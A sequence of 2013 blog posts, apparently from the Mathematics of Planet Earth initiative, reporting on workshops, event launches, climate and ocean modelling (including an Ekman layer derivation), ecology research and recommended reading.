    Another project, also brought by the EPA, looked at improving the detection of toxic chemicals in our environment. Hormones, and estrogen in particular, interact with receptor molecules and trigger a cascade of molecular reactions in the body, called the “estrogen pathway”. In this problem the group tried to determine whether man-made chemicals affect this chain of reactions, thereby disrupting the natural balance of chemicals in our body. In order to test the action of various chemicals, in vitro tests have been developed which are far more efficient and cheaper than live animal testing. However the reactions that take place in these tests are themselves complex, and so a positive reading on one of these tests could also be due to activity that is unrelated to the estrogen cascade. For this reason, several different tests are performed on each chemical in order to determine its effect on the estrogen pathway. The EPA provided the team with data from multiple tests on 1800 chemicals. The problem was to determine from this data which chemicals activated the estrogen pathway, hence causing imbalance in the body. Previous attempts to solve this problem used statistical analyses based only on the data. In contrast, the AIM team used knowledge of the chemical reactions involved in the estrogen pathway, along with the data, to formulate a constrained optimization problem whose solution indicates each chemical’s tendency to interfere with these reactions. The team’s method was tested on a group of thirty-five reference chemicals that are well understood, yielding good results. The method can be refined so that the EPA can use it to effectively test chemicals on other hormonal pathways.

    The fourth and final project considered at the workshop came from Southern California Edison (SCE). Understanding the dynamics of electrical demand is important in planning our infrastructure in order to optimize our energy resources. One important feature to understand is how energy use depends on weather conditions. SCE brought our group historical data of the demand at different distribution stations. The problem was to understand which stations were “winter-peaking” (i.e., peak demand at low temperature), which were “summer-peaking” (peak demand at high temperature), and which locations were “temperature-independent” (i.e., no correlation). The AIM team developed several statistical tests to understand these correlations. In particular, they found that a linear regression was not sufficient to capture significant correlations; rather, piecewise linear regressions were much more effective. One interesting discovery was that winter-peaking stations were more important in terms of energy demand than SCE had previously thought. The AIM team was also able to give SCE advice on how to improve data collection and recording. These predictive models have the potential to enable energy companies to plan effectively, and to accurately evaluate the benefits of the use of solar panels and other types of renewable energy that depend on weather conditions.

    Posted in Ecology, Workshop Report | Leave a comment

    March 5th: MPE Day at UNESCO

    An exciting day is coming up shortly. Now that MPE2013 has been launched in North America, the next launch will take place in Europe at the UNESCO Headquarters in Paris on March 5, 2013. The same day will see the launch of the MPE Open Source Exhibition, the outcome of an international competition for modules for a traveling exhibit. The jury for this competition, chaired by Ehrhard Behrends, met in early January, shortly after the deadline for submissions of December 20, 2012, at the Institute for Computational and Experimental Research in Mathematics (ICERM) in Providence, Rhode Island, to decide on the winners of the competition and the modules that will be on view at UNESCO during MPE Day and until March 8. The winners of the competition will receive their prize in Paris during MPE Day.

    The MPE Open Source Exhibition will be hosted permanently through the IMAGINARY project at Oberwolfach. Andreas Daniel Matt and his team in Oberwolfach are working hard to install the modules on the Open Source IMAGINARY platform, which has been released in the public domain. Several of the modules will be available in different languages.

    In parallel to the modules submitted for the competition, Centre-Sciences (CCSTI) of the region Centre (Orleans-France) is putting together a physical traveling exhibit of a dozen hands-on modules, which will also be on view at UNESCO on MPE Day. While this traveling exhibit can be rented, it is also Open Source, and a description of the modules will be added to the website of the MPE Open Source Exhibition. The MPE Open Source Exhibition is expected to grow in the future; several scientists have already committed to contribute new modules, and we hope that many more will follow.

    MPE Day, March 5, at UNESCO in Paris is hosted jointly by the International Mathematical Union (IMU) and UNESCO. It will be opened by Irina Bokova, Director-General of UNESCO. In addition to the launch of MPE2013 and the opening of the exhibit, the program will feature a presentation of the film EXIT sponsored by the Cartier Foundation for art. Edward Lungu (Botswana), recipient of the Su Buchin Prize at the 2011 International Congress of Industrial and Applied Mathematics (ICIAM), will deliver a lecture on “Utilizing the environment to manage HIV/AIDS.” In his presentation, Professor Lungu will discuss strategies to reduce the HIV/AIDS epidemic and poverty in sub-Sahara Africa through better treatment, better education and economic development.

    MPE Day will be concluded with a panel discussion on the topic “What Can Mathematics Do for the Planet?” Panelists will be MPE researchers, the UNESCO programme specialist in hydrology/tsunamis, and special guest Fanja Rakotondrajao (University of Madagascar).

    A public lecture “Climate Models: Mathematical, Physical and Conceptual Models” by Professor Hervé Le Treut, Director of the Institute Pierre Simon Laplace, will follow at 18h:30 on the Jussieu campus of the University Pierre-et-Marie-Curie.

    Attendance at MPE Day is by invitation. To request an invitation, send a message to Omobolanle Sandey . The event will take place in the Fontenoy Builing of UNESCO, 7 place de Fontenoy, room XI, Paris 75007.

    Posted in Conference Announcement, General, Public Event | Leave a comment

    Mathematics and Climate

    [Adapted from Chapter 1 of the forthcoming text “Mathematics and Climate” by Hans G. Kaper and Hans Engler, to be published by the Society for Industrial and Applied Mathematics (SIAM), 2013.]

    What is the role of mathematics in climate science? Climate science, like meteorology, is largely a branch of physics; as such, it certainly uses the language of mathematics. But could mathematics provide more than the language for scientific discourse?

    As mathematicians, we are used to setting up models for physical phenomena, usually in the form of equations. For example, we recognize the second-order differential equation $$L x ̈(t)+ g \sin x(t) = 0$$ as a model for the motion of a physical pendulum under the influence of gravity. Every symbol in the equation has its counterpart in the physical world. The quantity $x(t)$ stands for the angle between the arm of the pendulum and its rest position (straight down) at the time $t$, the constant $L$ is the length of the pendulum arm, and $g$ is gravitational acceleration. The mass of the bob turns out to be unimportant and therefore does not appear in the equation. The model is understood by all to be an approximation, and part of the modeling effort consists in outlining the assumptions that went into its formulation. For example, it is assumed that there is no friction in the pendulum joint, there is no air resistance, the arm of the pendulum is massless, and the pendulum bob is idealized to be a single point. Understanding these assumptions and the resulting limitations of the model is an essential part of the modeling effort. Note that the modeling assumptions can all be assessed by an expert who is not a mathematician: a clockmaker can estimate the effect of friction in the joint, the difficulty of making a slender pendulum arm, and the effort in making a bob that offers little air resistance. As mathematicians, we take the differential equation and apply the tools of the trade to extract information about the behavior of the physical pendulum. For example, we can find its period — which is important in the design of pendulum clocks — in terms of measurable quantities.

    Would it be possible to develop a “mathematical model” of the Earth’s climate system in a similar fashion? Such a model should stay close to physical reality, climate scientists should be able to assess the assumptions, and mathematicians and computational scientists should be able to extract information from it.


    This?
    Incoming and Outgoing Radiation
    Or This?

    The figure on the left gives a climate scientist’s view of the Earth’s climate system: a system with many components that interact with one another either directly or indirectly, and with many built-in feedback loops, both positive and negative. To develop a mathematical model of such a complex system, we would need to select variables that describe the state of the system (air temperature, humidity, fractions of aerosols and trace gases in the atmosphere, strength of ocean currents, rate of evaporation from vegetation cover, change in land use due to natural cycles and human activity, and many many more), take the rules that govern their evolution (laws of motion for gases and fluids, chemical reaction laws, land use and vegetation patterns, and many many more), and translate all this into the language of mathematics. It is not at all clear that this can be done equally well for all components of the system. The laws for airflow over a mountain range may be well known, but it is much harder to predict crop use and changes in vegetation. The ranges and limitations of any such model would remain subject to debate, much more so than in the case of the pendulum equation, and the resulting equations would likely cover several pages and would be far too unwieldy for a mathematical analysis. This would leave a computational approach as the only viable option. But even here we would face limitations, given the available computational resources and the scarcity of data.

    Surprisingly often, mathematics can offer perspectives that complement or provide insight into the results of observations and large-scale computational experiments. Through inspired model reduction and sometimes just clever guessing, it is often possible to come up with relativity simple models for components of the climate system that still retain some essential features observed in the physical world, that reproduce complex phenomena quite faithfully, and that lead to additional questions. The two figures on the right illustrate a simple energy balance model for the entire planet. It posits that the solar energy reaching the Earth must balance the energy that the Earth radiates back into outer space; otherwise, the planet will heat up or cool down. The model focuses on the global mean surface temperature and reproduces the current state of the climate system remarkably well with just a few physical parameters (solar output, reflectivity of the Earth’s surface, greenhouse effect). The model also shows that the Earth’s climate system can have multiple stable equilibrium states. One of these states is the “Snowball Earth” state, where the entire planet is covered with snow and ice and temperatures are well below freezing everywhere. Why is the planet at today’s climate when much colder climates are also possible? Has the planet ever been in one of the much colder climate states in the past? (The answer is yes.) Is there any danger that Earth could again revert to a much colder climate in the future? How would this happen? Mathematics can raise these questions from a very simple climate model and also support or rule out certain answers using an analysis of the model.

    Posted in Climate Modeling, Mathematics | Leave a comment

    Stochastics in Geophysical Fluid Dynamics

    A workshop is taking place this week at the American Institute of Mathematics (AIM) in Palo Alto, California, on “Stochastics in Geophysical Fluid Dynamics: Mathematical foundations and physical underpinnings.”

    This workshop is co-organized by Nathan Glatt-Holtz (Institute of Mathematics and Its Applications, IMA, University of Minnesota, on leave from Virginia Tech), Boris Rozovskii (Brown University), Roger Temam (Indiana University) and Joseph Tribbia (National Center of Atmospheric and Oceanic Research, NCAR). The workshop brings together 30 researchers from the geophysical fluid mechanics, partial differential equations, and probability communities. Two formal lectures are given in the mornings, open discussion sections take place in the afternoons.

    On Monday, the opening day of the workshop, Joseph Tribbia gave the first lecture on the use of stochastics to represent uncertainties in data and models. In the second lecture, Mohammed Ziane described the current state of the mathematical theory of the deterministic Primitive Equations of the atmosphere/ocean system, which play a central role in many General Circulation Models. The afternoon was devoted to a lively discussion in which members of each of the three communities represented at the workshop had the opportunity to ask questions, explanations and clarifications of members of the other communities and make suggestions for future interactions and collaborations.

    Nathan Glatt-Holtz, Boris Rozovskii, Roger Temam Joe Tribbia

    Posted in Geophysics, Mathematics | Leave a comment

    It’s a Math Eat Math World

    A book review in the January 11 issue of Science magazine begins with a wonderful line: “It is not often that mathematical theory is tested with a machine gun.”

    The book under review is “How Species Interact: Altering the Standard View on Trophic Ecology,” by Roger Arditi and Lev R. Ginzburg (Oxford University Press, 2012). In it, according to reviewer Rolf O. Peterson at the School of Forest Resources and Environmental Science at Michigan Technological University, the authors argue in favor of a theory they developed in the 1980s, that predator-prey dynamics, which is classically viewed as principally depending on prey density, is better viewed as depending on the ratio of prey to predator. “I admit to being impressed by the immediate usefulness of viewing predation through ratio-dependent glasses,” Peterson writes.

    The details of the debate lie within the equations, which Peterson, quoting from the classic essay, “The Unreasonable Effectiveness of Mathematics in the Natural Sciences” by Eugene Wigner, calls a “wonderful gift.” (Peterson ruefully adds that many of his colleagues in wildlife management “have an unfortunate phobia for all things mathematical.” “Trophic” ecology, by the way, is rooted in the Greek word “trophe,” for “nourishment.” It is basically the study of food chains, which are mathematical from top to bottom.) The two “sides” of the debate may actually lie at opposite ends of a spectrum, with prey density predominating when predators are rare and the prey-to-predator ratio taking over when predators become dense enough themselves to interfere or compete with one another. The best course mathematically may be to take a page from the fundamentalists and “teach the controversy.”

    As for the machine gun, you’ll want to read Peterson’s review, which, if you subscribe to Science, is available here — suffice it here to say, it has something to do with wolves, Alaska, and aircraft. But the story predates Sarah Palin by a couple of decades.

    Barry Cipra

    Posted in Ecology, General | Leave a comment

    Ice Floes, Coriolis Acceleration and Estimating the Viscosity of Air and Water

    I have wanted to run this story down since I saw the reference in Lamb’s Hydrodynamics to a paper by G. I. Taylor that contains a description of what oceanic and atmospheric scientists call “Ekman layers.” Physical oceanographers learn early in their careers that the Norwegian oceanographer Fritjof Nansen, on the Fram expedition of 1893-1896 noted that ice floes tend to drift to the right of the wind, and suggested to his colleague Vilhelm Bjerknes that the problem be assigned to a student. Bjerknes chose Ekman, who came up with the result associated with his name. Ekman’s result can be found in lots of places, e.g., the Wikipedia page on Ekman layers or just about any text on physical oceanography, e.g. Knauss, Introduction to Physical Oceanography. Ekman explained the crosswind transport of ice floes by assuming a balance of Coriolis acceleration and viscous drag. The bare bones of the derivation go like this:

    Steady flow governed by a balance of Coriolis force and viscous drag looks like this:
    \begin{align*}
    -fv &= \nu u_{zz}\\
    fu &= \nu v_{zz}\\
    f &= 2\Omega \sin \phi
    \end{align*}
    where $(u,v)$ are the horizontal velocity components, $\Omega = 2\pi/86400{\_}$ sec is the angular rotation rate of the earth, $\phi$ is the latitude and $\nu$ is the viscosity, about which more later. For the flow near the ocean surface, the vector wind stress $(\tau^{(x)},\tau^{(y)})$ enters as a boundary condition $(\tau^{(x)},\tau^{(y)}) = \nu (u,v)_z$. The trick is to divide by $\nu$ on both sides, multiply the first equation by $i$ and add it to (and subtract it from) the second, yielding the complex conjugate scalar ODEs
    \begin{align*}
    &(u+iv)_{zz}-i(f/\nu)(u+iv) = 0\\
    &(u-iv)_{zz}+i(f/\nu)(u-iv) = 0
    \end{align*}
    These equations are readily solved to find
    \begin{align*}
    u &= \frac{\surd 2}{fd}e^{z/d}\left ( \tau^{(x)}\cos(z/d -\pi /4) -\tau^{(y)}\sin(z/d – \pi /4)\right)\\
    v &= \frac{\surd 2}{fd}e^{z/d}\left ( \tau^{(x)}\sin(z/d -\pi /4) +\tau^{(y)}\cos(z/d – \pi /4) \right)
    \end{align*}
    where $d=(2\nu /f)^{1/2}$. Integrating over the water column from $z=-\infty$ to $z=0$ yields the result that transport is to the right of the wind. If you draw the two-component current vectors at each depth as arrows, with the tails on the $z$-axis, you will see that the heads trace out a nice spiral. There are pictures in lots of places, e.g. the Wikipedia page on Ekman layers.

    Oceanographers talk casually about Ekman layers and Ekman transports, but, to be precise, Ekman layers do not appear in nature. The real atmosphere and ocean are turbulent. Vertical momentum transfers do not occur by simple diffusion, and characterization of penetration of surface stress into the interior fluid by a simple scalar diffusion coefficient is only the crudest approximation. Ekman knew this. He noted that if he used the measured viscosity of sea water for $\nu$ and typical wind stress magnitudes for $\tau^{(x,y)}$ the surface layer would be less than a meter thick. He did not refer to the work of Reynolds on turbulence, and much of Ekman’s dissertation is concerned with trying to model flow in the real ocean in terms of the mathematical tools available to him.

    G. I Taylor was apparently unaware of Ekman’s work when he applied the same analytical machinery to form an expression for the surface velocity profile in the atmospheric surface boundary layer. (Taylor, 1915: Eddy motion in the atmosphere, Phil. Trans. R. Soc. Lond. A., 215). Taylor was interested in quantifying the transport of physical properties by macroscopic eddies, i.e., he wanted to estimate what we now recognize as eddy diffusivity and eddy viscosity. Taylor compared the solutions of his equations to observations taken from balloons and backed out estimates of kinematic viscosities varying over an order of magnitude, from about $3\cdot 10^4$ and $6 \cdot 10^4 \mathrm{cm}^2 / \mathrm{sec}$ over land, and from $7.7\cdot 10^2$ to $6.9\cdot 10^3 \mathrm{cm}^2 / \mathrm{sec}$ over water. The molecular kinematic viscosity of air, by comparison, is more like $10^{-3} \mathrm{cm}^2 / \mathrm{sec}$. The sixth edition of Lamb’s Hydrodynamics contains discussions of both Ekman’s and Taylor’s work. It’s just as well that we refer to “Ekman layers” rather than “Taylor layers.” Ekman was first, after all.

    Richardson, in his (1922) book {\it Weather Prediction by Numerical Process}, laid out specific methodology for numerical weather prediction. Richardson was a man far before his time. He could not have conceived of an electronic computer — his book was published decades before the work of Turing and von Neumann. He imagined that numerical weather prediction would be done by great halls full of people working the mechanical calculators of the day. Richardson understood that he would need to specify the viscosity of air, and, after examining the results available to him, including Taylor’s work, he concluded that air is slightly more viscous than Lyle’s Golden Syrup and slightly less viscous than shoe polish.

    Ninety years after the publication of Richardson’t book, we have come a very long way but we still don’t know how to deal with turbulent transports in models of the ocean and atmosphere.

    Robert Miller
    College of Earth, Ocean, and Atmospheric Sciences
    Oregon State University
    miller@coas.oregonstate.edu

    Posted in Atmosphere, Geophysics, Mathematics, Ocean | Leave a comment

    The New Math

    Why has the MPE2103 movement been popular with mathematicians? The traditional view of mathematicians is that they like to work in solitude and that there is a great divide between pure and applied mathematicians. So how has MPE2013, a massive collaborative effort on the part of pure and applied mathematical scientists, managed to bridge this chasm? It seems to me that there has never before been such a unified effort on the part of the mathematical sciences community, nor has the level and scale of collaboration been so apparent. To give you an idea of the scope, this year in MPE there will be more than 10 long-term programs, 60 workshops, dozens of special sessions at society meetings, two big lecture series, summer and winter schools for graduate students, research experiences for undergraduates, an art competition and traveling exhibition, and the promise that high-quality curriculum materials for all ages and grades will be developed this year—all of this coordinated by the more than 120 partner organizations. I’m pretty sure this level of effort and cooperation is unprecedented in the annals of mathematics.

    I think there are two explanations for the success of this initiative. One is that mathematical scientists have become far more collaborative than they used to be. Fifty years ago the average number of co-authors was 1.3 researchers per paper. Now it is more than 2. While it is common in the experimental sciences to have dozens of or even a hundred co-authors on a single publication, the record in pure mathematics until a few years ago was surely fewer than 10. There were 28 co-authors on the paper recently posted to the arxiv, which is now believed to be the record. This new degree of collaboration is undoubtedly due to the internet, the computer age, the ease of collaboration, and the fact that more and more workshops are devoted to creating and promoting collaborations.

    The second explanation is that it is becoming clearer to mathematicians that they have something tangible, something important to offer to the consideration of the problems of the planet. Many of the issues such as weather, climate, climate change, spread of disease, natural hazards and financial distortions lead to the creation of seriously complex mathematical models. Computers can quickly give us far more data than before, which leads to feedback and refinements of the models. Importantly, this process has also opened the door to new mathematical ideas that can enhance the modeling process. I am amazed by the way that pure mathematics can help with problems which were previously considered the sole domain of applied mathematics with its stock set of tools and methods. G. H. Hardy, the British
    number theorist, used to pride himself on his subject being so pure that there was virtually no chance for applications. But the fact that finding large prime numbers is easy, whereas factoring large composite numbers is hard, paved the way for the current ubiquity of internet security algorithms based on number theory. Large data sets can now be analyzed using algebraic topology to model the clusters. Statistics has been invaded by algebraic geometry. The high-brow theory of percolation within statistical mechanics is used to study ice. Modeling phase transitions is a seriously complicated endeavor that uses some of the most sophisticated mathematics around. Uncertainty quantification is a new field that can give new information about the likelihood of rare events occurring. Data assimilation is another important new tool. Perhaps it is becoming clearer that there is the opportunity for pure mathematicians to apply their know-how in ingenious ways to weigh in on some of the big problems that we face. Having a role for all mathematical scientists, I think, is the second factor that accounts for the apparent success of the MPE2013 initiative.

    A word of warning: mathematics moves slowly. We can’t expect great results from just one year of work. But we are off to a great start!

    Brian Conrey, Director
    American Institute of Mathematics
    conrey@aimath.org

    Posted in General, Mathematics | Leave a comment

    Recommended Reading

    Earlier this week, I had the good fortune to attend a talk here in Washington, DC, by former Vice-President Al Gore on “The Future, Six Drivers of Global Change.” This is the title of his latest book, which had just appeared. The talk was sponsored by my favorite bookstore, “Politics and Prose.”

    Mr. Gore is an excellent speaker, and I enjoyed hearing his vision of the future. The six drivers of global change, which are reflected in the chapter titles of the book, are Earth Inc. (the global economy, outsourcing, and robosourcing), the global mind (a planet-wide digital network and the “world brain”), power in the balance (the changing political equilibrium), outgrowth (natural resources and the integrity of our ecological system), the reinvention of life and death (the Life Sciences Revolution), and the edge (climate change). I will not try to summarize his theses, the book is worth your time if you are interested in this sort of things, and the price is right (US $30).

    My first move after acquiring the book was to check the Index, to see whether mathematics would be mentioned. I was not disappointed: one double entry “mathematics, mathematicians, xix, 209”. The text on page xix refers to the nature of fractal equations and the phenomenon of “self-sameness.” (I think we prefer the term “self-similarity”.) Alas, the text on page 209 is in the context of a discussion of the US educational system and its waning in “science, math, and engineering.” But Mr. Gore talked at length about complex systems using the right terms and about our climate system using the right numbers, so I am fairly confident that he has the facts correct. Anyway, the book is recommended reading for all mathematicians (and others) interested in Planet Earth in 2013 and beyond.

    Posted in Climate Change, Complex Systems, General, Social Systems, Sustainability | Leave a comment

    MPE Australia Launched!

    With a packed lecture theatre and the atmosphere to match, yesterday’s launch of Australia’s participation in Mathematics of Planet Earth was the big red-carpet event for maths and stats.

    Australian Chief Scientist, Professor Ian Chubb, opened the proceedings by discussing the growing demand for mathematical and statistical skills in the Australian workforce. He then set the scene for the year: to demonstrate to the public that mathematics underpins every aspect of our culture, science and economy, and challenged us all to refute the claim that mathematics has little relevance to society.

    Following the official launch, Professor Simon Levin, Princeton University, delivered the first in the international series of Mathematics of Planet Earth public lectures sponsored by the Simons Foundation. The lecture, entitled “The challenge of Sustainability and the Promise of Mathematics,” opened our eyes to the parallels between financial systems, ecological systems and governments. Professor Levin demonstrated the immense power – and limitations – of mathematics as a tool for predicting the behaviour of these systems, and hinted at how we might identify the signs of impending crisis. Many were amused by Levin’s question posed in an early-2008 paper published in Natureasking, “Who knows, for instance, how the present concern over sub-prime loans will pan out?”

    The lecture concluded with a discussion about models of collective behaviour, and how these may apply to achieving global consensus on environmental issues. Global cooperation really is the holy grail for achieving sustainability, and it seems that mathematics will play a central role. And it all starts with Mathematics of Planet Earth. As Professor Chubb put it, “This year is important for the whole of humanity.”

    Posted in General, Public Event | Leave a comment

    Presidential Inauguration 2013

    Like four years ago, my good friend David Levermore (U Maryland) and I joined the crowd that gathered on the National Mall in Washington, DC, yesterday to be part of the inauguration of President Barack Obama. It was a great experience sharing in the excitement as the crowd responded to introductions and stirring prose.

    Here is a paragraph that relates directly to what MPE2013 is all about:

    “We, the people, still believe that our obligations as Americans are not just to ourselves, but to all posterity. We will respond to the threat of climate change, knowing that the failure to do so would betray our children and future generations. Some may still deny the overwhelming judgment of science, but none can avoid the devastating impact of raging fires, and crippling drought, and more powerful storms. The path towards sustainable energy sources will be long and sometimes difficult. But America cannot resist this transition; we must lead it. We cannot cede to other nations the technology that will power new jobs and new industries – we must claim its promise. That is how we will maintain our economic vitality and our national treasure – our forests and waterways; our croplands and snowcapped peaks. That is how we will preserve our planet, commanded to our care by God. That’s what will lend meaning to the creed our fathers once declared.”

    This was also probably the first inaugural address to mention mathematics and science:

    “No single person can train all the math and science teachers we’ll need to equip our children for the future, or build the roads and networks and research labs that will bring new jobs and businesses to our shores.”

    Hans Kaper
    Georgetown University
    kaper@mathclimate.org

    Posted in General, Political Systems, Public Event | Leave a comment

    Our Changing Shoreline: Modeling the Effects of Storm Surges on Coastal Vegetation

    The unprecedented storm surge from Hurricane Sandy was enough to shift coastal shorelines along New York and New Jersey. One barrier island, Fire Island – off the southern coast of Long Island, N.Y., for example, traveled as much as 85 feet inland when the island’s dune eroded as a result of the storm.

    Storm surges associated with sea level rise are important predicted consequences of global climate change and have the potential for severe effects on the vegetation of low-lying coastal areas. Ocean water intrusion through storm surges can affect large areas in a short period of time, as we have seen recently with Hurricane Sandy.

    The question of how these storm surges affect coastal areas can be addressed mathematically and is the focus of award-winning research by Dr. Jiang Jiang, a postdoctoral fellow at the National Institute for Mathematical and Biological Synthesis (NIMBioS).

    Predicting the likelihood of the vegetation regime shifts requires detailed modeling of coupled ecological-hydroligic processes. Jiang’s recent work was awarded first prize in the MCED Award for Innovative Contributions to Ecological Modelling. MCED, which stands for Modelling Complex Ecological Dynamics, is a textbook presenting an overview in approaches and applications in ecological modeling. The textbook editors organize the annual award as a part of the Ecological Society of Germany, Austria and Switzerland (GfÖ) awards. The intention of the MCED award, which is given to young modelers who have finished their degree within the last three years, is to foster the development and application of modern ecological modeling methods that can help to expand the understanding of complex ecological dynamics.

    For Jiang’s winning project, “Modelling the emergence of self-stabilising sharp boundaries in ecotones of coastal marshland communities,” Jiang developed a model that coupled vegetation dynamics with hydrology and salinity to study factors that might affect vegetation in low-lying coastal areas.

    Modeling techniques used in the study are among the first to couple vegetation dynamics with hydrology and salinity to study the factors affecting coastal vegetation in areas where vegetation changes abruptly, called ecotones. In disentangling the mechanisms that maintain the stability of ecotones of coastal vegetation, the study reveals that the salinity, caused by tidal flux, is the key factor separating vegetation communities, while a self-reinforcing feedback is the main factor for creating the sharpness of coastal boundaries.
    The finding is indeed new for coastal wetland ecology and has implications for future research. Also, the model developed in the study is a new and interesting tool that will likely attract the attention of wetland ecologists who could use it to make better projections of possible changes in coastal vegetation due to storm surges.

    Work related to Jiang’s award-winning entry has appeared in two published papers –

    Jiang J, DeAngelis DL, Smith TJ, Teh SY, Koh HL. 2012. Spatial pattern formation of coastal vegetation in response to hydrodynamics of soil pore water salinity: A model study. Landscape Ecology 27:109-119 [online].

    Jiang J, Gao D, DeAngelis DL. 2012. Towards a theory of ecotone resilience: Coastal vegetation on a salinity gradient. Theoretical Population Biology 82:29-37 [online].

    Posted in Ecology, Mathematics, Natural Disasters | Leave a comment

    Mathematics of Planet Earth Australia 2013

    The Australian Mathematical Sciences Institute (AMSI) has partnered with societies and organisations across Australia to celebrate the important role mathematics and statistics play in today’s society.

    The Australian program will be launched on 29 January 2013 by Australia’s Chief Scientist, and patron of the year Professor Ian Chubb and Professor Simon Levin of Princeton University. This event is sponsored by the Simons Foundation.

    Professor Trachette Jackson from The University of Michigan gave the first in the MPE Australia Public Lecture series in Sydney on 8 January. She spoke about the essential role of mathematical biology in the 21st century.

    WEBSITE

    MPE Australia’s interactive website provides a forum for academics, university students, school children and the public to discuss, explore and celebrate everyday applications of maths and stats in the real world. With blogs on topics investigating the mathematics of body surfing, and the impacts of the Black Saturday smoke plume on global weather patterns there is something for everyone!

    Throughout the year we’ll also be having a coffee with some of Australia’s top maths minds.

    COMPETITIONS & ACTIVITIES

    Online puzzles and resources for both primary and secondary school teachers will bring MPE to Australian classrooms. On Pi Day students will learn about the intricacies of this important number and in Science Week will learn how to use shadows to measure the circumference of the earth.

    The first photography competition “Singling out Symmetry” has been launched. Each competition round will be announced via the website.

    EVENTS

    A series of MPE sponsored scientific workshops will also run throughout the year. Topics include the mathematics of transportation networks, ecology and statistics and modelling tumours.

    MPE Australia 2013, a major mid-year scientific conference, will explore the themes a planet at risk and a planet organised by humans. We will bring together researchers from various fields to build research collaborations and explore the role of mathematics and statistics in extreme events, demographics, earth systems, invasive species, large data sets, complex networks and the role of data in the world.

    These events, and more, will be advertised on the MPE Australia website.

    Posted in General, Public Event | Leave a comment

    The Discovery of Global Warming

    “As a dam built across a river causes a local deepening of the stream, so our atmosphere, thrown as a barrier across the terrestrial rays, produces a local heightening of the temperature at the Earth’s surface.” Thus in 1862 John Tyndall described the key to climate change. He had discovered in his laboratory that certain gases, including water vapor and carbon dioxide ( CO${}_2$), are opaque to heat rays. He understood that such gases high in the air help keep our planet warm by interfering with escaping radiation.
     
    This kind of intuitive physical reasoning had already appeared in the earliest speculations on how atmospheric composition could affect climate. It was in the 1820s that a French scientist, Joseph Fourier, first realized that the Earth’s atmosphere retains heat radiation. He had asked himself a deceptively simple question, of a sort that physics theory was just then beginning to learn how to attack: what determines the average temperature of a planet like the Earth? When light from the Sun strikes the Earth’s surface and warms it up, why doesn’t the planet keep heating up until it is as hot as the Sun itself? Fourier’s answer was that the heated surface emits invisible infrared radiation, which carries the heat energy away into space. He lacked the theoretical tools to calculate just how the balance places the Earth at its present temperature. But with a leap of physical intuition, he realized that the planet would be significantly colder if it lacked an atmosphere. (Later in the century, when the effect could be calculated, it was found that a bare rock at Earth’s distance from the Sun would be well below freezing temperature.)

    How does the Earth’s blanket of air impede the outgoing heat radiation? Fourier tried to explain his insight by comparing the Earth with its covering of air to a box with a glass cover. That was a well-known experiment — the box’s interior warms up when sunlight enters while the heat cannot escape. This was an overly simple explanation, for it is quite different physics that keeps heat inside an actual glass box, or similarly in a greenhouse. (As Fourier knew, the main effect of the glass is to keep the air, heated by contact with sun-warmed surfaces, from wafting away. The glass does also keep heat radiation from escaping, but that’s less important.) Nevertheless, people took up his analogy and trapping of heat by the atmosphere eventually came to be called “the greenhouse effect.”

    Source: American Institute of Physics

    Posted in General | Leave a comment

    MPE Mexican launch

    Tomorrow, January 18, 2013, will be the launch of the year of the Mathematics of the planet year in Mexico. The ceremony will be held at CIMAT (Guanajuato) at 5:30 p.m. during the closure of the “6º. Taller de Solución de Problemas Industriales. ” Luis Montejano, president of the SMM and José Antonio de la Peña dean of CIMAT, will present the MPE to the mathematical community.

    Posted in General, Public Event | Tagged | Leave a comment

    Global Warming — Recommended Reading

    Global warming, one of the most important science issues of the 21st century, challenges the very structure of our society. It touches on economics, sociology, geopolitics, local politics, and individuals’ choice of lifestyle. For those interested in learning more about the complexities of both the science and the politics of climate change, I recommend a nice little book by Mark Maslin, “Global Warming, A Very Short Introduction,” published by Oxford University Press, 2009 (ISBN 978-0-19-954824-8).

    Mark Maslin FRGS, FRSA is a Professor of Climatology at University College London. His areas of scientific expertise include causes of past and future global climate change and its effects on the global carbon cycle, biodiversity, rainforests and human evolution. He also works on monitoring land carbon sinks using remote sensing and ecological models and international and national climate change policies.

    Posted in Climate Change, General | Leave a comment

    From the JMM – Data Assimilation and the Mathematics of Planet Earth and Its Climate

    This session, organized by Thomas Bellsky, Arizona State University, and Lewis Mitchell, University of Vermont, focused on applications of data assimilation to climate issues. It opened with a talk by Chris Jones of the University of North Carolina at Chapel Hill, where he gave a wonderful overview of data assimilation and how it can be used in climate models. He also detailed the Lagrangian data assimilation problem from a Bayesian viewpoint. Of particular interest was the discussion of new techniques for making subsurface ocean observations, and how this data can be used to initialize climate models.

    The second speaker of the session was Juan Restrepo of the University of Arizona. Speaking to a large audience, Juan discussed how to determine whether high temperatures in Moscow are an extreme climate fluctuation or the result of a systematic global warming trend. He detailed the challenges for determining such a trend including inherent multi-scale effects, nonlinear effects, and incomplete knowledge of the climate. He introduced his group’s mathematical methodology for identifying such trends, where their method has the capability to deal with multi-scale time series.

    Elaine Spiller of Marquette University spoke on data assimilation applied to a simple kinetic model of a three-dimensional ocean eddy. Their methods fit a bias function modeling the difference between such a kinetic model and the data, and then use the bias-corrected
    kinematic model to explore eddy dynamics. Marc Kjerland of the University of Illinois at Chicago discussed techniques for obtaining the evolution of the slow variables for a simple two-scale climate model, to then obtain a correction term for the fast dynamics. A short discussion period was held to informally discuss research, with a focus on the Math Climate Research Network (MCRN) and future MPE2013 events. Lewis Mitchell spoke after the break on finite size Lyapunov exponents and data assimilation, where he focused on systems with slow and fast regimes. Thomas Bellsky spoke on methods for targeting observations with Ensemble Kalman filter techniques. Additionally, he spoke on new parameter estimation techniques, and how this research is important in future climate modeling in order to establish a more rigorous methodology for tuning model parameters.

    DA Session

    Nicholas Allgaier, University of Vermont

    The session wrapped up with talks from Nicholas Allgaier, University of Vermont, and Daniel Vasiliu, College of William and Mary. Nicholas spoke on an empirical model correction procedure comparing short forecasts with a reference truth system, in order to calculate state-independent model bias and state-dependent error patterns. Their results suggest that the correction procedure is more effective for reducing error and prolonging forecast usefulness than parameter tuning. Daniel spoke on how the number of variables in data often has no predetermined relationship to the number of observations. His research identifies the relationship between certain outcomes and limited data, by a novel variable selection procedure, where further results were detailed.

    This session was a great opportunity to both get introduced to some basic concepts from data assimilation and climate science, and to learn about many exciting areas of focused research. Perhaps the best part about such a session is to gather with new and old colleagues to hold further informal discussions over dinner and at future MPE2013 events.

    Posted in Climate Modeling, Conference Report, Data Assimilation, General | Leave a comment

    Mathematical Demography and Population Biology

    In concert with the MPE 2013 initiative, the NSF’s Mathematical Biosciences Institute (MBI) at Ohio State will host the Keyfitz Centennial Symposium on Mathematical Demography in June 2013, cosponsored by the OSU Institute for Population Research (IPR).

